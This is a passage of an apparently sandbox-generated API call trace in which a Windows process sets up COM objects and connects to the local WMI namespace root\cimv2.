[3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c180 | out: ppv=0x26c180*=0x52108e0) returned 0x0 [0056.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x52108e0, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26c398 | out: ppvObject=0x26c398*=0x0) returned 0x80004002 [0056.589] WbemDefPath:IClassFactory:CreateInstance (in: This=0x52108e0, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c3ac | out: ppvObject=0x26c3ac*=0x5210978) returned 0x0 [0056.589] WbemDefPath:IUnknown:Release (This=0x52108e0) returned 0x0 [0056.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210978, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bfcc | out: ppvObject=0x26bfcc*=0x5210978) returned 0x0 [0056.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210978, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26bf88 | out: ppvObject=0x26bf88*=0x0) returned 0x80004002 [0056.589] WbemDefPath:IUnknown:AddRef (This=0x5210978) returned 0x3 [0056.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210978, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26b8e4 | out: ppvObject=0x26b8e4*=0x0) returned 0x80004002 [0056.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210978, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26b894 | out: ppvObject=0x26b894*=0x0) returned 0x80004002 [0056.589] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210978, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26b8a0 | out: ppvObject=0x26b8a0*=0x6f9f98) returned 0x0 [0056.589] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6f9f98, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26b8a8 | out: pCid=0x26b8a8*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0056.589] WbemDefPath:IUnknown:Release (This=0x6f9f98) returned 0x3 [0056.589] CoGetContextToken (in: pToken=0x26b900 | out: pToken=0x26b900) returned 0x0 [0056.590] CoGetContextToken (in: pToken=0x26bd08 | out: pToken=0x26bd08) returned 0x0 [0056.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210978, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bd98 | out: ppvObject=0x26bd98*=0x0) returned 0x80004002 [0056.590] WbemDefPath:IUnknown:Release (This=0x5210978) returned 0x2 [0056.590] WbemDefPath:IUnknown:Release (This=0x5210978) returned 0x1 [0056.590] CoGetContextToken (in: pToken=0x26c690 | out: pToken=0x26c690) returned 0x0 [0056.590] CoGetContextToken (in: pToken=0x26c5f0 | out: pToken=0x26c5f0) returned 0x0 [0056.590] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210978, riid=0x26c6c0*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26c6bc | out: ppvObject=0x26c6bc*=0x5210978) returned 0x0 [0056.590] WbemDefPath:IUnknown:AddRef (This=0x5210978) returned 0x3 [0056.590] WbemDefPath:IUnknown:Release (This=0x5210978) returned 0x2 [0056.590] WbemDefPath:IWbemPath:SetText (This=0x5210978, uMode=0x4, pszPath="//./root/cimv2") returned 0x0 [0056.591] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210978, puCount=0x26cf50 | out: puCount=0x26cf50*=0x2) returned 0x0 [0056.591] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26cf4c*=0x0, pszText=0x0 | out: puBuffLength=0x26cf4c*=0xf, pszText=0x0) returned 0x0 [0056.591] WbemDefPath:IWbemPath:GetText (in: This=0x5210978, lFlags=4, puBuffLength=0x26cf4c*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf4c*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0056.591] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cf00 | out: ppv=0x26cf00*=0x6ded34) returned 0x0 [0056.591] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cef8 | out: pAptType=0x26cef8*=1) returned 0x0 [0056.591] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cefc | out: ppvObject=0x26cefc*=0x0) returned 0x80004002 [0056.591] IUnknown:Release (This=0x6ded34) returned 0x0 [0056.592] CoGetClassObject (in: rclsid=0x700824*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26c868 | out: ppv=0x26c868*=0x5210918) returned 0x0 [0056.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210918, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26ca80 | out: ppvObject=0x26ca80*=0x0) returned 0x80004002 [0056.593] WbemDefPath:IClassFactory:CreateInstance (in: This=0x5210918, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ca94 | out: ppvObject=0x26ca94*=0x5210b30) returned 0x0 [0056.593] WbemDefPath:IUnknown:Release (This=0x5210918) returned 0x0 [0056.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210b30, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6b4 | out: ppvObject=0x26c6b4*=0x5210b30) returned 0x0 [0056.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210b30, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c670 | out: ppvObject=0x26c670*=0x0) returned 0x80004002 [0056.593] WbemDefPath:IUnknown:AddRef (This=0x5210b30) returned 0x3 [0056.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210b30, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26bfcc | out: ppvObject=0x26bfcc*=0x0) returned 0x80004002 [0056.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210b30, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26bf7c | out: ppvObject=0x26bf7c*=0x0) returned 0x80004002 [0056.593] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210b30, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26bf88 | out: ppvObject=0x26bf88*=0x6f9fc8) returned 0x0 [0056.593] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x6f9fc8, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26bf90 | out: pCid=0x26bf90*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0056.593] WbemDefPath:IUnknown:Release (This=0x6f9fc8) returned 0x3 [0056.593] CoGetContextToken (in: pToken=0x26bfe8 | out: pToken=0x26bfe8) returned 0x0 [0056.594] CoGetContextToken (in: pToken=0x26c3f0 | out: pToken=0x26c3f0) returned 0x0 [0056.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210b30, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c480 | out: ppvObject=0x26c480*=0x0) returned 0x80004002 [0056.594] WbemDefPath:IUnknown:Release (This=0x5210b30) returned 0x2 [0056.594] WbemDefPath:IUnknown:Release (This=0x5210b30) returned 0x1 [0056.594] CoGetContextToken (in: pToken=0x26cd78 | out: pToken=0x26cd78) returned 0x0 [0056.594] CoGetContextToken (in: pToken=0x26ccd8 | out: pToken=0x26ccd8) returned 0x0 [0056.594] WbemDefPath:IUnknown:QueryInterface (in: This=0x5210b30, riid=0x26cda8*(Data1=0x3bc15af2, Data2=0x736c, Data3=0x477e, Data4=([0]=0x9e, [1]=0x51, [2]=0x23, [3]=0x8a, [4]=0xf8, [5]=0x66, [6]=0x7d, [7]=0xcc)), ppvObject=0x26cda4 | out: ppvObject=0x26cda4*=0x5210b30) returned 0x0 [0056.594] WbemDefPath:IUnknown:AddRef (This=0x5210b30) returned 0x3 [0056.594] WbemDefPath:IUnknown:Release (This=0x5210b30) returned 0x2 [0056.594] WbemDefPath:IWbemPath:SetText (This=0x5210b30, uMode=0x4, pszPath="\\\\.\\root\\cimv2") returned 0x0 [0056.594] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210b30, puCount=0x26cf28 | out: puCount=0x26cf28*=0x2) returned 0x0 [0056.594] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf24*=0x0, pszText=0x0 | out: puBuffLength=0x26cf24*=0xf, pszText=0x0) returned 0x0 [0056.595] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf24*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf24*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0056.595] CoGetObjectContext (in: riid=0x227ba68*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cf28 | out: ppv=0x26cf28*=0x6ded34) returned 0x0 [0056.595] IComThreadingInfo:GetCurrentApartmentType (in: This=0x6ded34, pAptType=0x26cf20 | out: pAptType=0x26cf20*=1) returned 0x0 [0056.596] IUnknown:QueryInterface (in: This=0x6ded34, riid=0x227ba50*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x26cf24 | out: ppvObject=0x26cf24*=0x0) returned 0x80004002 [0056.596] IUnknown:Release (This=0x6ded34) returned 0x0 [0056.596] IIDFromString (in: lpsz="{4590F811-1D3A-11D0-891F-00AA004B2E24}", lpiid=0x26ce34 | out: lpiid=0x26ce34) returned 0x0 [0056.597] CoGetClassObject (in: rclsid=0x700854*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x26cb48 | out: ppv=0x26cb48*=0x5210a10) returned 0x0 [0056.749] WbemLocator:IUnknown:QueryInterface (in: This=0x5210a10, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26cd60 | out: ppvObject=0x26cd60*=0x0) returned 0x80004002 [0056.749] WbemLocator:IClassFactory:CreateInstance (in: This=0x5210a10, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cd74 | out: ppvObject=0x26cd74*=0x5210cf0) returned 0x0 [0056.749] WbemLocator:IUnknown:Release (This=0x5210a10) returned 0x0 [0056.749] WbemLocator:IUnknown:QueryInterface (in: This=0x5210cf0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c994 | out: ppvObject=0x26c994*=0x5210cf0) returned 0x0 [0056.749] WbemLocator:IUnknown:QueryInterface (in: This=0x5210cf0, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c950 | out: ppvObject=0x26c950*=0x0) returned 0x80004002 [0056.750] WbemLocator:IUnknown:AddRef (This=0x5210cf0) returned 0x3 [0056.750] WbemLocator:IUnknown:QueryInterface (in: This=0x5210cf0, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c2ac | out: ppvObject=0x26c2ac*=0x0) returned 0x80004002 [0056.750] WbemLocator:IUnknown:QueryInterface (in: This=0x5210cf0, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c25c | out: ppvObject=0x26c25c*=0x0) returned 0x80004002 [0056.750] WbemLocator:IUnknown:QueryInterface (in: This=0x5210cf0, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c268 | out: ppvObject=0x26c268*=0x0) returned 0x80004002 [0056.750] CoGetContextToken (in: pToken=0x26c2c8 | out: pToken=0x26c2c8) returned 0x0 [0056.750] CoGetObjectContext (in: riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x70e1dc | out: ppv=0x70e1dc*=0x6ded28) returned 0x0 [0056.750] CoGetContextToken (in: pToken=0x26c6d0 | out: pToken=0x26c6d0) returned 0x0 [0056.751] WbemLocator:IUnknown:QueryInterface (in: This=0x5210cf0, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c760 | out: ppvObject=0x26c760*=0x0) returned 0x80004002 [0056.751] WbemLocator:IUnknown:Release (This=0x5210cf0) returned 0x2 [0056.751] WbemLocator:IUnknown:Release (This=0x5210cf0) returned 0x1 [0056.751] CoGetContextToken (in: pToken=0x26cd40 | out: pToken=0x26cd40) returned 0x0 [0056.751] CoGetContextToken (in: pToken=0x26cca0 | out: pToken=0x26cca0) returned 0x0 [0056.751] WbemLocator:IUnknown:QueryInterface (in: This=0x5210cf0, riid=0x26cd70*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x26cd6c | out: ppvObject=0x26cd6c*=0x5210cf0) returned 0x0 [0056.752] WbemLocator:IUnknown:AddRef (This=0x5210cf0) returned 0x3 [0056.752] WbemLocator:IUnknown:Release (This=0x5210cf0) returned 0x2 [0056.762] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210b30, puCount=0x26cf04 | out: puCount=0x26cf04*=0x2) returned 0x0 [0056.763] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=8, puBuffLength=0x26cf00*=0x0, pszText=0x0 | out: puBuffLength=0x26cf00*=0xf, pszText=0x0) returned 0x0 [0056.763] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=8, puBuffLength=0x26cf00*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf00*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0056.764] CoCreateInstance (in: rclsid=0x75241284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x752412e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x26cddc | out: ppv=0x26cddc*=0x5210d00) returned 0x0 [0056.764] WbemLocator:IWbemLocator:ConnectServer (in: This=0x5210d00, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x26ce70 | out: ppNamespace=0x26ce70*=0x521d4f4) returned 0x0 [0063.851] WbemLocator:IUnknown:QueryInterface (in: This=0x521d4f4, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cd0c | out: ppvObject=0x26cd0c*=0x70f4dc) returned 0x0 [0063.852] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x70f4dc, pProxy=0x521d4f4, pAuthnSvc=0x26cd5c, pAuthzSvc=0x26cd58, pServerPrincName=0x26cd50, pAuthnLevel=0x26cd54, pImpLevel=0x26cd44, pAuthInfo=0x26cd48, pCapabilites=0x26cd4c | out: pAuthnSvc=0x26cd5c*=0xa, pAuthzSvc=0x26cd58*=0x0, pServerPrincName=0x26cd50, pAuthnLevel=0x26cd54*=0x6, pImpLevel=0x26cd44*=0x2, pAuthInfo=0x26cd48, pCapabilites=0x26cd4c*=0x1) returned 0x0 [0063.852] WbemLocator:IUnknown:Release (This=0x70f4dc) returned 0x1 [0063.852] WbemLocator:IUnknown:QueryInterface (in: This=0x521d4f4, riid=0x752410f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cd00 | out: ppvObject=0x26cd00*=0x70f4fc) returned 0x0 [0063.852] WbemLocator:IUnknown:QueryInterface (in: This=0x521d4f4, riid=0x75241104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26ccfc | out: ppvObject=0x26ccfc*=0x70f4dc) returned 0x0 [0063.852] WbemLocator:IClientSecurity:SetBlanket (This=0x70f4dc, pProxy=0x521d4f4, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0063.852] WbemLocator:IUnknown:Release (This=0x70f4dc) returned 0x2 [0063.852] WbemLocator:IUnknown:Release (This=0x70f4fc) returned 0x1 [0063.852] CoTaskMemFree (pv=0x700a58) [0063.852] WbemLocator:IUnknown:Release (This=0x5210d00) returned 0x0 [0063.853] WbemLocator:IUnknown:QueryInterface (in: This=0x521d4f4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c8fc | out: ppvObject=0x26c8fc*=0x70f4fc) returned 0x0 [0063.853] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x26c8b8 | out: ppvObject=0x26c8b8*=0x0) returned 0x80004002 [0063.853] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x26c6d4 | out: ppvObject=0x26c6d4*=0x0) returned 0x80004002 [0063.854] WbemLocator:IUnknown:AddRef (This=0x70f4fc) returned 0x3 [0063.854] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x26c214 | out: ppvObject=0x26c214*=0x0) returned 0x80004002 [0063.854] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x26c1c4 | out: ppvObject=0x26c1c4*=0x0) returned 0x80004002 [0063.854] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c1d0 | out: ppvObject=0x26c1d0*=0x70f45c) returned 0x0 [0063.855] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x70f45c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x26c1d8 | out: pCid=0x26c1d8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0063.855] WbemLocator:IUnknown:Release (This=0x70f45c) returned 0x3 [0063.855] CoGetContextToken (in: pToken=0x26c230 | out: pToken=0x26c230) returned 0x0 [0063.855] CoGetContextToken (in: pToken=0x26c638 | out: pToken=0x26c638) returned 0x0 [0063.855] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26c6c8 | out: ppvObject=0x26c6c8*=0x70f4e4) returned 0x0 [0063.855] WbemLocator:IRpcOptions:Query (in: This=0x70f4e4, pPrx=0x70f4fc, dwProperty=2, pdwValue=0x26c6f0 | out: pdwValue=0x26c6f0) returned 0x80004002 [0063.855] WbemLocator:IUnknown:Release (This=0x70f4e4) returned 0x3 [0063.855] WbemLocator:IUnknown:Release (This=0x70f4fc) returned 0x2 [0063.855] CoGetContextToken (in: pToken=0x26cc10 | out: pToken=0x26cc10) returned 0x0 [0063.855] CoGetContextToken (in: pToken=0x26cb70 | out: pToken=0x26cb70) returned 0x0 [0063.855] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x26cc40*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x26cc3c | out: ppvObject=0x26cc3c*=0x521d4f4) returned 0x0 [0063.855] WbemLocator:IUnknown:AddRef (This=0x521d4f4) returned 0x4 [0063.855] WbemLocator:IUnknown:Release (This=0x521d4f4) returned 0x3 [0063.858] WbemLocator:IUnknown:Release (This=0x521d4f4) returned 0x2 [0063.865] SysStringLen (param_1=0x0) returned 0x0 [0063.866] CoGetContextToken (in: pToken=0x26cc40 | out: pToken=0x26cc40) returned 0x0 [0063.866] WbemLocator:IUnknown:AddRef (This=0x70f4fc) returned 0x3 [0063.866] WbemLocator:IUnknown:QueryInterface (in: This=0x70f4fc, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x26cad4 | out: ppvObject=0x26cad4*=0x70f4fc) returned 0x0 [0063.866] WbemLocator:IUnknown:Release (This=0x70f4fc) returned 0x3 [0063.866] WbemLocator:IUnknown:Release (This=0x70f4fc) returned 0x2 [0063.867] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x5210b30, puCount=0x26cf4c | out: puCount=0x26cf4c*=0x2) returned 0x0 [0063.867] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf48*=0x0, pszText=0x0 | out: puBuffLength=0x26cf48*=0xf, pszText=0x0) returned 0x0 [0063.867] WbemDefPath:IWbemPath:GetText (in: This=0x5210b30, lFlags=4, puBuffLength=0x26cf48*=0xf, pszText="00000000000000" | out: puBuffLength=0x26cf48*=0xf, 